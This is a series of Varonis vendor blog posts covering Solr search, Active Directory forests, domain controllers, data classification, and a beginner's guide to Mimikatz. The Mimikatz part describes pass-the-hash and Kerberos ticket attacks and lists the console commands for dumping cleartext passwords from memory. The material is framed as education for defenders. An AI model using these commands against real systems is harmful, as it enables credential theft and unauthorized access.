Varonis leverages Solr to optimize and streamline the process of analyzing data related to a cybersecurity incident. Solr makes the stack of needles smaller – enabling security teams to analyze incidents faster.


How is Varonis using Solr?

The Solr server is a repository for the most current Varonis log and alert data, making searches in the Varonis WebUI lightning fast. The Varonis WebUI presents the searches in a clean and customizable view that you can filter and narrow down to find the correct needle in that stack of needles.

New events and alerts are available in the Varonis WebUI immediately, and Solr indexes the data as it is received. The Varonis WebUI correlates and contextualizes the data into understandable and actionable alerts, which can combine seemingly unrelated events into a clear picture of a coordinated cyberattack.

The new Solr search engine starts providing data while the search is running. The search field has autocomplete, so you can see possible search parameters as you type, just like in Google. You can save searches, set your favorite filters or queries, and easily access them again in the future.

What are the Advantages of Solr?

Solr is an open-source search optimized database that is used throughout the software industry. With the new WebUI powered by Solr, customers are seeing faster alerts, easier forensic analysis, and quicker query return.

Some of the features of Solr that Varonis uses are:

  • Advanced Full-Text Search Capabilities: Solr uses the Lucene search engine to implement powerful and optimized searching and indexing
  • Optimized for High Volume Traffic: Solr has proven its capability to operate at extremely large scales all over the world
  • Easy Monitoring: Solr includes self-monitoring tools via Java Management Extensions (JMX) for system performance and uptime monitoring
  • Highly Scalable and Fault-Tolerant: Solr scales up and down easily depending on your loads and use cases. Rebalancing and fault tolerance are built into Solr out of the box
  • Near Real-Time Indexing: Solr can index and search at the same time

The Varonis WebUI is an awesome tool for advanced alerting and investigating cybersecurity incidents. The WebUI is fast and easy to navigate, but the real power is how Varonis analyzes the data and uses advanced threat models to paint an easy to understand picture of cybersecurity attacks.

See the new Varonis WebUI in a free 1:1 Demo – and experience how fast and easy responding to cybersecurity threats with Varonis can be.

What is Mimikatz: The Beginner’s Guide

what is mimikatz hero

Benjamin Delpy originally created Mimikatz as a proof of concept to show Microsoft that their authentication protocols were vulnerable to attack. Instead, he inadvertently created one of the most widely used and downloaded hacker tools of the past 20 years.

Rendition Infosec’s Jake Williams said, “Mimikatz has done more to advance security than than any other tool I can think of.” If you’re tasked with protecting Windows networks, it’s essential to keep up with the latest Mimikatz updates to understand the techniques hackers will use to infiltrate your networks – and stay one step ahead.

What is Mimikatz?

Mimikatz is an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.

Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.

mimikatz definition

What Can Mimikatz Do?

Mimikatz originally demonstrated how to exploit a single vulnerability in the Windows authentication system. Now the tool demonstrates several different kinds of vulnerabilities. Mimikatz can perform credential-gathering techniques such as:

  • Pass-the-Hash: Windows used to store password data in an NTLM hash. Attackers use Mimikatz to pass that exact hash string to the target computer to login. Attackers don’t even need to crack the password, they just need to use the hash string as is. It’s the equivalent of finding the master key to a building on the floor. You need that one key to get into all the doors.
  • Pass-the-Ticket: Newer versions of windows store password data in a construct called a ticket.  Mimikatz provides functionality for a user to pass a kerberos ticket to another computer and login with that user’s ticket. It’s basically the same as pass-the-hash otherwise.
  • Over-Pass the Hash (Pass the Key): Yet another flavor of the pass-the-hash, but this technique passes a unique key to impersonate a user you can obtain from a domain controller.
  • Kerberos Golden Ticket: This is a pass-the-ticket attack, but it’s a specific ticket for a hidden account called KRBTGT, which is the account that encrypts all of the other tickets. A golden ticket gives you domain admin credentials to any computer on the network that doesn’t expire.
  • Kerberos Silver Ticket: Another pass-the-ticket, but a silver ticket takes advantage of a feature in Windows that makes it easy for you to use services on the network. Kerberos grants a user a TGS ticket, and a user can use that ticket to log into any services on the network. Microsoft doesn’t always check a TGS after it’s issued, so it’s easy to slip it past any safeguards.
  • Pass-the-Cache: Finally an attack that doesn’t take advantage of Windows! A pass-the-cache attack is generally the same as a pass-the-ticket, but this one uses the saved and encrypted login data on a Mac/UNIX/Linux system.

what can mimikatz do

Where to Download Mimikatz

You can download Mimikatz from Benjamin Delpy’s GitHub – he offers several options to download, from the executable to the source code. You will need to compile with Visual Studio 2010 or later.

How Do You Use Mimikatz

When you run Mimikatz with the executable, you get a Mimikatz console in interactive mode where you can run commands in real time.

Run Mimikatz as Administrator: Mimikatz needs to be “Run as Admin” to function completely, even if you are using an Administrator account.

Checking Version of Mimikatz

There are 2 versions of Mimikatz: 32bit and 64bit. Make sure you are running the correct version for your installation of Windows. Run the command ‘version’ from the Mimikatz prompt to get information about the Mimikatz executable, the Windows version, and if there are any Windows settings that will prevent Mimikatz from running correctly.

Extracting clear text passwords from memory

The sekursla module in Mimikatz lets you dump passwords from memory. To use the commands in the sekurlsa module, you must have Admin or SYSTEM permissions.

First, run the command:

mimikatz # privilege::debug

The output will show if you have appropriate permissions to continue.

Next, start the logging functions so you can refer back to your work.

mimikatz # log nameoflog.log

And finally, output all of the clear text passwords stored on this computer.

mimikatz # sekurlsa::logonpasswords

Using Other Mimikatz modules

The crypto module allows you to access the CryptoAPI in Windows which lets you list and export certificates and their private keys, even if they’re marked as non-exportable.

The kerberos module accesses the Kerberos API so you can play with that functionality by extracting and manipulating Kerberos tickets.

The service module allows you to start, stop, disable, etc. Windows services.

And lastly, the coffee command returns ascii art of coffee. Cause everyone needs coffee.

There is so much more to Mimikatz. If you are looking at penetration testing or you just want to dig into the Windows authentication internals, check out some of these other references and links:

Want to Mimikatz in action and learn how Varonis protects you from infiltration?  Join our free Live Cyber Attack Workshop and see our engineers execute a live cyberattack in our security lab.

What is an Active Directory Forest?

What is an Active Directory Forest?

An Active Directory forest (AD forest) is the top most logical container in an Active Directory configuration that contains domains, users, computers, and group policies.

“But wait?” you say. “I thought Active Directory was just one domain?”

A single Active Directory configuration can contain more than one domain, and we call the tier above domain the AD forest. Under each domain, you can have several trees, and it can be tough to see the forest for the trees

This additional top-level layer creates security challenges and increased potential for exploitation, but it can also mean greater isolation and autonomy when necessary: the trick is to understand AD forests and different strategies to protect them.

active directory forest diagram

How to Create a Forest Design?

Say you want to create a forest, or (and more likely) you have inherited a forest that you need to clean up. It’s common to see several different domains and GPOs in one or more forests that try to coexist due to earlier attempts at consolidation or acquisition.

First, determine if there are any organizational requirements that require a completely separate set of security policies. Frame the conversation with a focus on data security:

  • Are there over-arching policies you can set at the AD forest level?
  • Do you need additional domains with different security policies or segregated network connectivity?
  • Are there legal or application requirements that require separate domains in the forest?

Once you have the “autonomy and isolation” requirements documented, the design team can build the forest, domains, and GPOs according to each team or organization’s needs.

How Many Forests are Required?

In some cases, it might be necessary to create separate AD forests based on the autonomy or isolation requirements. Adding additional forests multiplies the complexity to manage the AD schema. There are some considerations to make if you decide to add another forest to your AD schema:

  • Can you achieve sufficient isolation without creating a second forest?
  • Do all of the stakeholders understand the ramifications of separate forests?
    • Management of 2 separate forests means you will have double the application servers and IT costs.
  • Do you have the resources to manage another forest?
    • A single IT team should not manage both AD forests. Security professionals recommend one (1) IT team per forest for segregation of duties.
    • Best practice is to migrate new or acquired domains into a single AD forest.

Single Forest vs Multi-Forest Active Directory Design

A single AD forest is a simpler solution long-term and generally considered best practice. It’s possible to create a secure environment without the additional overhead of a 2nd AD forest with multiple domains by leveraging GPOs, established data owners, and a least privilege model.

Multi-forests do provide an extra layer of security across the two domains, but at a significant increase to IT cost. Multi-forests do not make you more secure by default. You still need to configure GPOs and permissions appropriately for each AD forest.

Forest Design Models

types of active directory forest design models

There are three primary ways to design an AD forest: you can mix and match those designs to meet your organization’s security needs. Every Active Directory has at least one AD forest, and there are cases where multiple AD forests are required to meet business and security objectives. Here are a few different Forest Models. Each model has different advantages and disadvantage, and unique use cases.

Organizational Forest Model

In an organizational forest, user accounts and resources are stored and managed together. This is the standard configuration.

Characteristics of an organizational forest model:

  • Provides autonomy to users and resources in the forest
  • Isolates services and data from anyone outside the forest
  • Trust relationships between forests can allow access to some resources that live in outside forests

Resource Forest Model

A resource forest separates user accounts and resources into different forests. You would use this configuration to separate a manufacturing system or mission-critical system from the primary forest, so any problems with one forest allow the other to continue operation.

Characteristics of a Resource Forest Model:

  • Users live in the organizational forest
  • Resources live in one or more additional forests
  • Only alternative administrative user accounts live in the resource forests
  • Trusts enable resource sharing with the users
  • This model provides service isolation, so if one forest goes down the others will continue to operate as normal.

Restricted Access Forest Model

A restricted access forest totally isolates the users and resources in it from other forests. You would use this configuration to completely secure data and limit users to specific datasets.

Characteristics of a Restricted Access Forest Model:

  • No trusts exist to other forests
  • Users from other forests are not able to access resources in the restricted access forest
  • Users need a 2nd computer to access the restricted forest
  • Can be housed on a completely separate network if necessary

Active Directory Forests Best Practices

AD forests have been around since 2000, so there are many different theories about the best way to configure Active Directory and forests. Current best practices include:

  • When possible, consolidate to a single forest
  • Secure resources and data via GPO and apply a least privileged model
  • Use GPOs to further limit users ability to create new folders without following a set process. The least privileged permissions model.
  • Give your domain admins a 2nd admin account they use only when required per the change management process.
  • If you have multiple AD forests with trust relationships, consider consolidation.
  • If you need to create a restricted access forest, make sure it is truly restricted. As secure as we want the primary forest to be, a restricted access forest should be Castle Black. Put a 700’ wall around it and keep it there.

active directory forest best practices

If Active Directory holds the keys to the kingdom, the AD forest is the keyring for some of those keys: it’s important not only to secure Active Directory, but to understand how to configure and manage the AD forest in order to prevent data breaches and reduce security vulnerabilities.

Want to learn more about how to protect Active Directory – regardless of how many AD forests you have?  Learn about 5 FSMO Roles in Active Directory, and check out the difference between AD for Windows and Azure Active Directory.  Prefer an audio/visual experience instead?  We’ve got you covered: watch an on-demand webinar on 4 Tips to Secure Active Directory.


What is a Domain Controller, When is it Needed + Set Up

domain controller hero image

A domain controller is a server that responds to authentication requests and verifies users on computer networks. Domains are a hierarchical way of organizing users and computers that work together on the same network. The domain controller keeps all of that data organized and secured.

The domain controller (DC) is the box that holds the keys to the kingdom- Active Directory (AD). While attackers have all sorts of tricks to gain elevated access on networks, including attacking the DC itself, you can not only protect your DCs from attackers but actually use DCs to detect cyberattacks in progress.

What is The Main Function of a Domain Controller?

domain controller use

The primary responsibility of the DC is to authenticate and validate user access on the network. When users log into their domain, the DC checks their username, password, and other credentials to either allow or deny access for that user.

Microsoft Active Directory or Microsoft AzureAD are the most common examples, while Samba is the Linux based equivalent DC.

Why is a Domain Controller Important?

Domain controllers contain the data that determines and validates access to your network, including any group policies and all computer names. Everything an attacker could possibly need to cause massive damage to your data and network is on the DC, which makes a DC a primary target during a cyberattack.

Domain Controller vs. Active Directory


Active Directory is a type of domain, and a domain controller is an important server on that domain. Kind of like how there are many types of cars, and every car needs an engine to operate. Every domain has a domain controller, but not every domain is Active Directory.

Do I Need a Domain Controller?

In general, yes. Any business – no matter the size – that saves customer data on their network needs a domain controller to improve security of their network. There could be exceptions: some businesses, for instance, only use cloud based CRM and payment solutions. In those cases, the cloud service secures and protects customer data.

The key question you need to ask is “where does my customer data live and who can access it?”

The answer determines if you need a domain – and DC – to secure your data.

domain controller benefits and limitations

Benefits of Domain Controller

  • Centralized user management
  • Enables resource sharing for files and printers
  • Federated configuration for redundancy (FSMO)
  • Can be distributed and replicated across large networks
  • Encryption of user data
  • Can be hardened and locked-down for improved security

Limitations of Domain Controller

  • Target for cyberattack
  • Potential to be hacked
  • Users and OS must be maintained to be stable,  secure and up-to-date
  • Network is dependent on DC uptime
  • Hardware/software requirements

How to Set Up a Domain Controller + Best Practices

best practices for setting up a domain controller

  • Configure a stand-alone server for your domain controller.
    • If you are using Azure AD as your domain controller you can ignore this step.
    • If not, your DC should act exclusively as a DC.
  • Limit both physical and remote access to your DC as much as possible.
    • Consider local disk encryption (BitLocker)
    • Use GPOs to provide access to the SysAdmins in charge of administering Active Directory, and allow no other users to log in, either on the console or via Terminal Services.
  • Standardize your DC configuration for reuse

Setting up a secure and stable DC doesn’t not mean you are secure forever. Attackers will still try to hack into your DC to escalate privileges or enable lateral movement throughout your network. Varonis monitors AD for out-of-policy GPO changes, Kerberos attacks, privilege escalations, and more.

Want to see how it works? Get a personalized 1:1 demo to how Varonis protects DCs and Active Directory from cyberattacks.

What is Data Classification? Guidelines and Process

data classification title

In order to protect your sensitive data, you have to know what it is and where it lives.

Data Classification Defined

Data classification is the process of analyzing structured or unstructured data and organizing it into categories based on the file type and contents.

Data classification is a process of searching files for specific strings of data, like if you wanted to find all references to “Szechuan Sauce” on your network. Or if you needed to know where all HIPAA protected data lives on your network. Or if you want to prepare for data privacy regulations and need to identify any personally identifiable information (PII) on your data stores.

definition of data classification

Data classification is usually based on a file parser combined with a string analysis system. A file parser allows the data classification engine to read the contents of several different types of files. A string analysis system then matches data in the files to defined search parameters.

RegEx –short for regular expression – is one of the more common string analysis systems that defines specifics about search patterns. For example, if I wanted to find all VISA credit card numbers in my data, the RegEx would look like:

\b(?<![:$._’-])(4\d{3}[ -]\d{4}[ -]\d{4}[ -]\d{4}\b|4\d{12}(?:\d{3})?)\b

That sequence tells the RegEx system that we are looking for a pattern with a 4 digit number starting with the number 4 followed by a dash and a second 4 digit number and… you get the idea. Only a string of characters that matches the RegEx directly generates a positive result.

Although there are some parallels between the two, data classification is not the same as data indexing. Classification looks for identifiers based on patterns and returns a list of files and how many matches it found for each pattern. It doesn’t necessarily index those files. Indexing enables search, and you’ll need to search those matches to fulfill data subject access requests and right-to-be-forgotten requests.

Reasons for Data Classification

reasons to implement data classification

The Center for Internet Security (CIS)- which devotes an entire section to data classification protections – says data classification is important because “in several high-profile breaches over the past two years, attackers were able to gain access to sensitive data stored on the same servers with the same level of access as far less important data.”

Beyond data security concerns, there are several other reasons to implement a data classification process:

  • Identify sensitive files, intellectual property, and trade secrets
  • Secure (and lock down) critical data
  • Track regulated data to comply with regulations like HIPAA, PCI, or GDPR
  • Optimize search capabilities with data indexing
  • Discover statistically significant patterns or trends inside data
  • Optimize storage by identifying duplicate or stale data

Data Classification Process: 4 Steps

Data classification processes differ slightly depending on the objectives for the project. Any data classification project requires automation to process the astonishing amount of data that companies create every day. In general, there are some ubiquitous criteria required to create any data classification process:

  1. Define the objectives of the data classification process. What are you looking for? Why?
  2. Create workflows based on the selected classification tools. How does the classification process work? Is there a process in place to scan new data? Is there a process to create new classification criteria?
  3. Define the categories and classification criteria. What kinds of data should you search for? What process will you follow to validate the classification results?
  4. Define outcomes and usage of classified data. How are the results organized – and how do you plan to make business decisions based on those results?

Data Classification Tips

  • Use automated tools to process large volumes of data quickly
  • Leverage RegExes and Luhn: create custom classification patterns or implement software that does the heavy lifting for you
  • Validate your classification results: nobody likes a false positive.
  • Figure out how to best use your results and apply classification to everything from data security to business intelligence.

Data Classification FAQ

How does Varonis do Data Classification differently?

Varonis has over 400 pre-configured RegExes to discover all manners of PII, PHI, and GDPR data with a fully customizable classification engine you can configure for any business purposes. Varonis monitors over 60 file types out of the box (including documents, spreadsheets, and more), and identifies new data that needs to be re-scanned (without starting the whole thing over) to catch new and recently added sensitive files, including:

  • Personal information: credit card numbers, passport numbers, driver’s license numbers, social security numbers, IBAN, and more
  • Financial records
  • Security file types (.cer, crt, p7b, etc.)
  • Regulated data (GDPR, HIPAA, PII, PHI, PCI, Sarbanes Oxley, GLBA, etc.)

The Varonis Data Classification Engine can process ~100 GB of data in an hour (caveats about your own hardware and network capacity) and includes rigorous false positive checks that reduce the workload to analyze the classification results. Not every 16 character numeric string is a credit card number, for instance, and Varonis knows the difference.

What Comes After Data Classification?

Varonis brings context to that classification. Varonis not only identifies the data that you’re looking for, but shows you who can access to that data – and who is accessing that data. Once you identify and classify sensitive data, you can take action on it: apply labels, lock down permissions, monitor access, alert on suspicious activity, and meet compliance requirements like right-to-be-forgotten. The Varonis Data Classification Engine allows you to protect your most sensitive and important data from unwanted access, accidental data leaks, and security attacks.

See the Data Classification Engine in action with a 1:1 demo.